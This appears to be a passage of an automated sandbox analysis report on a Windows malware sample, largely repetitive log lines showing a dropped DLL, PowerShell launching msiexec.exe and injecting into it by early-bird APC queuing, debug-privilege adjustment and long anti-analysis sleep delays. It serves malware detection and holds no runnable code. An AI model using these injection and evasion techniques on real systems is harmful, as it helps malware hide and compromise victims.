Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594841	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594733	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594624	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6947			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2765			Jump to behavior

Source: C:\Users\user\Desktop\66776676676.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7140	Thread sleep count: 8093 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7140	Thread sleep count: 1767 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599668s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599452s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598248s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597912s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597574s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597248s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595827s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595717s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595499s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -594841s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -594733s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152	Thread sleep time: -594624s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599668	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598248	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597912	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597574	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597248	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595827	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595717	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594841	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594733	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594624	Jump to behavior

Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd2148b155d302<

Source: C:\Users\user\Desktop\66776676676.exe

API call chain: ExitProcess graph end node

graph_0-3488

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
